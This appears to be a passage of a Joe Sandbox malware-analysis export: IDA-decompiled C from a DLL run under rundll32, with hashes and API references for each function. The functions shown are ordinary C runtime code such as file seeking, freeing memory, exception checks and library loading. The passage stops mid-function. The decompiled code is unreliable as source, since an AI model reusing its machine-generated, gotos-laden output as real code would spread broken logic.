Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction ID: b32e4abf061af2b49d691e16b66c44ce7c89ffe3064c7ed98f8274118a3d5f98
Opcode Fuzzy Hash: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction Fuzzy Hash: 3251F471A00705EFDB11CF69EC41B6A73F4FF48765B914569E84AE7250EB32EA40CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1003939F, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1003939F(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E10024468(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12);
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E1002449E(__eflags);
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(__eflags > 0) {
						goto L6;
					}
				}
				return _t21;
			}

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 100393B5
GetLastError.KERNEL32(?,?,?), ref: 100393BF
__dosmaperr.LIBCMT ref: 100393C6
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 100393E4
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 1003940A

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction ID: b407cb5834295830b04853e8380503d0af7682c42ed55c8a01c32ac15598fb64
Opcode Fuzzy Hash: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction Fuzzy Hash: C6015371901129FFDB12EFA1CC4899F3FBDEF017A1F518554F8249A1A0CB309A81DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002F136, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002F136(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x1004d788; // 0x1004d7dc
					if(_t23 != 0) {
						E100268B3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1004d78c; // 0x1004e868
					if(_t24 != 0) {
						E100268B3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1004d790; // 0x1004e868
					if(_t25 != 0) {
						E100268B3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1004d7b8; // 0x1004d7e0
					if(_t26 != 0) {
						E100268B3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x1004d7bc; // 0x1004e86c
					if(_t27 != 0) {
						return E100268B3(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 1002F14E

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F160
_free.LIBCMT ref: 1002F172
_free.LIBCMT ref: 1002F184
_free.LIBCMT ref: 1002F196

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction ID: 6117e9590aa72a6bc89c84abd52b3ea92389668d0d0b3033db3b93dc22f4f4dd
Opcode Fuzzy Hash: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction Fuzzy Hash: 70F09631508210D7E650EBA4FEC6C2673E9EA053D43E0492EF458D7600CB30FC808E94

Uniqueness

Uniqueness Score: -1.00%

Function 100055B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E100055B0(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				void* __esi;
				void* __ebp;
				void* _t19;
				void* _t21;
				signed int _t26;
				signed int _t35;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				signed int* _t44;

				_t34 = __ecx;
				_t33 = __ebx;
				_t42 = _a4;
				_push(__edi);
				_t40 =  *_t42;
				if( *_t40 == 0xe0434352 ||  *_t40 == 0xe0434f4d) {
					_t19 = E10005A3D(_t33, _t34, _t38, _t42);
					__eflags =  *(_t19 + 0x18);
					if( *(_t19 + 0x18) > 0) {
						_t21 = E10005A3D(_t33, _t34, _t38, _t42);
						_t3 = _t21 + 0x18;
						 *_t3 =  *(_t21 + 0x18) - 1;
						__eflags =  *_t3;
					}
				} else {
					if( *_t40 == 0xe06d7363) {
						 *((intOrPtr*)(E10005A3D(__ebx, __ecx, _t38, _t42) + 0x10)) = _t40;
						_t43 =  *((intOrPtr*)(_t42 + 4));
						 *((intOrPtr*)(E10005A3D(__ebx, __ecx, _t38, _t43) + 0x14)) = _t43;
						E1001200F(__ebx, __ecx, _t38, __eflags);
						asm("int3");
						_push(__ecx);
						_push(__ecx);
						_push(_t43);
						_t44 = _v8;
						 *_t44 =  *_t44 & 0x00000000;
						_t26 =  *(E10005A3D(_t33, __ecx, _t38, _t44) + 0x10);
						__eflags = _t26;
						if(_t26 == 0) {
							L12:
							__eflags = 0;
							return 0;
						}
						_t35 =  *(_t26 + 0x1c);
						__eflags = _t35;
						if(_t35 == 0) {
							goto L12;
						}
						__eflags =  *_t35 & 0x00000010;
						if(( *_t35 & 0x00000010) == 0) {
							_t15 =  &_v12;
							 *_t15 = _v12 & 0x00000000;
							__eflags =  *_t15;
							_v16 = _t26;
							_push( &_v16);
							_push(0x1004d938);
							 *_t44 = E10005672(_t33, _t40);
							goto L12;
						}
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)))) - 4));
					} else {
					}
				}
				return 0;
			}

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 10005644

Strings

MOC, xrefs: 100055C2
csm, xrefs: 100055CA
RCC, xrefs: 100055BA

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction ID: ba491e0a52f827d7fd065b4ce93cba473ca224792a09d2010a1ea98d05584bc9
Opcode Fuzzy Hash: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction Fuzzy Hash: 24116075504204DFEB08DF64C841A9BB7F8EF052D7F51009AE8418B265E776FE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000D7D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000D7D1(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E10023828(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x1000d7de
0x1000d7e6
0x1000d81b
0x1000d7e8
0x1000d7f1
0x00000000
0x1000d818
0x1000d817
0x1000d817

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,1000D78C), ref: 1000D7DE
GetLastError.KERNEL32(?,1000D78C), ref: 1000D7E8
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 1000D810

Strings

api-ms-, xrefs: 1000D7F5

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction ID: e74e9b093023e81d82c4867d880b496c8476b2db1d57206d9312647a4de92240
Opcode Fuzzy Hash: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction Fuzzy Hash: D4E04830380249B7FF006F60DD46B4D3B58EB11AC1F60C431FA0CE80F5DB61A85586A8

Uniqueness

Uniqueness Score: -1.00%

Function 1002D2F3, Relevance: 6.3, APIs: 4, Instructions: 320
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E1002D2F3(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E1000F794( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t18 = _t177 + 1; // 0x2
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x2
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E1003F990( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E1002DB0D(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x2
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E100050F0(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E1003F990( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t63 = _t105 + 2; // 0x12
										_t168 = _t63;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E1003F890();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E1003F890();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E1003F890();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t68 = _t168 + 1; // 0x2
													_t174 = _t68;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E1002D602(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E10041D10(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E1002449E(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E1000E314();
				goto L66;
			}

APIs

_strrchr.LIBCMT ref: 1002D37D

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction ID: 60edc47403ceb57e4c32773f528f628eab84e72a7bd41eb7e043d998d246c257
Opcode Fuzzy Hash: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction Fuzzy Hash: 68B19B719006969FDB01EF28D881BEEBBF5EF45344F6140ABE844DB241D674AE01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10005B62, Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E10005B62() {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				void* _t58;
				void* _t61;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed char _t80;
				signed char _t83;
				signed char* _t84;
				signed char _t96;
				signed char* _t97;
				signed char* _t99;
				signed char* _t104;
				void* _t108;

				_push(0x10);
				_push(0x1004b018);
				E100040F0();
				_t74 = 0;
				_t52 =  *(_t108 + 0x10);
				_t80 = _t52[4];
				if(_t80 == 0 ||  *((intOrPtr*)(_t80 + 8)) == 0) {
					L30:
					_t53 = 0;
					goto L31;
				} else {
					_t96 = _t52[8];
					if(_t96 != 0 ||  *_t52 < 0) {
						_t83 =  *_t52;
						_t104 =  *(_t108 + 0xc);
						if(_t83 >= 0) {
							_t104 =  &(( &(_t104[0xc]))[_t96]);
						}
						 *(_t108 - 4) = _t74;
						_t99 =  *(_t108 + 0x14);
						if(_t83 >= 0 || ( *_t99 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t108 + 8));
							if((_t83 & 0x00000008) == 0) {
								if(( *_t99 & 0x00000001) == 0) {
									_t83 =  *(_t54 + 0x18);
									if(_t99[0x18] != _t74) {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											_t78 = 0;
											_t74 = (_t78 & 0xffffff00 | ( *_t99 & 0x00000004) != 0x00000000) + 1;
											 *(_t108 - 0x20) = _t74;
											goto L29;
										}
									} else {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											E1000D9E0(_t104, E1000558B(_t83,  &(_t99[8])), _t99[0x14]);
											goto L29;
										}
									}
								} else {
									if( *(_t54 + 0x18) == 0 || _t104 == 0) {
										goto L32;
									} else {
										E1000D9E0(_t104,  *(_t54 + 0x18), _t99[0x14]);
										if(_t99[0x14] == 4 &&  *_t104 != 0) {
											_push( &(_t99[8]));
											_push( *_t104);
											goto L21;
										}
										goto L29;
									}
								}
							} else {
								_t83 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x1004dfb0; // 0x0
							 *((intOrPtr*)(_t108 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x1004223c();
								_t83 =  *((intOrPtr*)(_t108 - 0x1c))();
								L12:
								if(_t83 == 0 || _t104 == 0) {
									L32:
									E10012120(_t74, _t83, _t96, _t104);
									asm("int3");
									_push(8);
									_push(0x1004b038);
									E100040F0();
									_t97 =  *(_t108 + 0x10);
									_t84 =  *(_t108 + 0xc);
									if( *_t97 >= 0) {
										_t101 =  &(( &(_t84[0xc]))[_t97[8]]);
									} else {
										_t101 = _t84;
									}
									 *(_t108 - 4) =  *(_t108 - 4) & 0x00000000;
									_t105 =  *(_t108 + 0x14);
									_push( *(_t108 + 0x14));
									_push(_t97);
									_push(_t84);
									_t76 =  *((intOrPtr*)(_t108 + 8));
									_push( *((intOrPtr*)(_t108 + 8)));
									_t58 = E10005B62() - 1;
									if(_t58 == 0) {
										_t61 = E100069CC(_t101, _t105[0x18], E1000558B( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])));
									} else {
										_t61 = _t58 - 1;
										if(_t61 == 0) {
											_t61 = E100069DC(_t101, _t105[0x18], E1000558B( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])), 1);
										}
									}
									 *(_t108 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t61;
								} else {
									 *_t104 = _t83;
									_push( &(_t99[8]));
									_push(_t83);
									L21:
									 *_t104 = E1000558B();
									L29:
									 *(_t108 - 4) = 0xfffffffe;
									_t53 = _t74;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

APIs

___AdjustPointer.LIBCMT ref: 10005C29
___AdjustPointer.LIBCMT ref: 10005C4C
___AdjustPointer.LIBCMT ref: 10005CE8

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction ID: 31fa209adb8231de4210eaca4de771a1eb96de73e4b0f2c6b5dc5ef330e7e6b6
Opcode Fuzzy Hash: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction Fuzzy Hash: E351C075600706AFFB29CF10D881FAB77A4EF443D2F204529EC0596699EB32ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B1EA, Relevance: 6.2, APIs: 4, Instructions: 165
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E1000B1EA(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char* _v20;
				void* __esi;
				char _t54;
				void* _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t69;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr* _t74;
				signed int _t82;
				signed int _t83;
				signed int _t86;
				void* _t95;
				char* _t101;
				char* _t102;
				char* _t107;
				signed int* _t109;

				_t100 = __ebx;
				_t101 =  *0x1004e004; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t54 =  *_t101;
				if(_t54 == 0) {
					L15:
					E10007662(_t101, _a4, 1, _a8);
					L16:
					L17:
					return _a4;
				}
				_t57 = _t54 - 0x24;
				if(_t57 == 0) {
					_t58 =  *((intOrPtr*)(_t101 + 1));
					__eflags = _t58 - 0x24;
					if(_t58 == 0x24) {
						_t109 = _a8;
						_t101 = _t101 + 2;
						 *0x1004e004 = _t101;
						_t59 =  *_t101;
						__eflags = _t59 - 0x51;
						if(__eflags > 0) {
							_t60 = _t59 - 0x52;
							__eflags = _t60;
							if(_t60 == 0) {
								_t102 =  &_v12;
								_push( &_v20);
								__eflags =  *_t109;
								if( *_t109 == 0) {
									_v20 = "volatile";
									_v16 = 8;
								} else {
									_v20 = "volatile ";
									_v16 = 9;
								}
								E10007500(_t102);
								_t101 =  *0x1004e004; // 0x0
								L42:
								_push(3);
								L12:
								_v20 =  *_t109;
								 *0x1004e004 = _t101 + 1;
								_v16 =  *(_t109 + 4) | 0x00000100;
								_push( &_v20);
								_push( &_v12);
								_push(_a4);
								E1000B576(_t100);
								goto L17;
							}
							_t69 = _t60 - 1;
							__eflags = _t69;
							if(_t69 == 0) {
								_t43 = _t101 + 1; // -1
								 *0x1004e004 = _t43;
								L37:
								_t71 = _a4;
								 *((intOrPtr*)(_t71 + 4)) = 0;
								 *((char*)(_t71 + 4)) = 2;
								 *_t71 = 0;
								return _t71;
							}
							_t72 = _t69 - 1;
							__eflags = _t72;
							if(_t72 == 0) {
								_t34 = _t101 + 1; // -1
								 *0x1004e004 = _t34;
								_t74 = _t109;
								__eflags =  *_t74;
								if( *_t74 == 0) {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									E1000723E(_a4,  &_v20);
									goto L17;
								}
								_v20 = "std::nullptr_t ";
								_v16 = 0xf;
								E10007615(_t101, _a4,  &_v20, _t74);
								goto L16;
							}
							__eflags = _t72 - 5;
							if(__eflags != 0) {
								goto L37;
							}
							_t33 = _t101 + 1; // -1
							 *0x1004e004 = _t33;
							E1000BBAD(0, __eflags, _a4);
							L6:
							goto L17;
						}
						if(__eflags == 0) {
							goto L42;
						}
						_t82 = _t59;
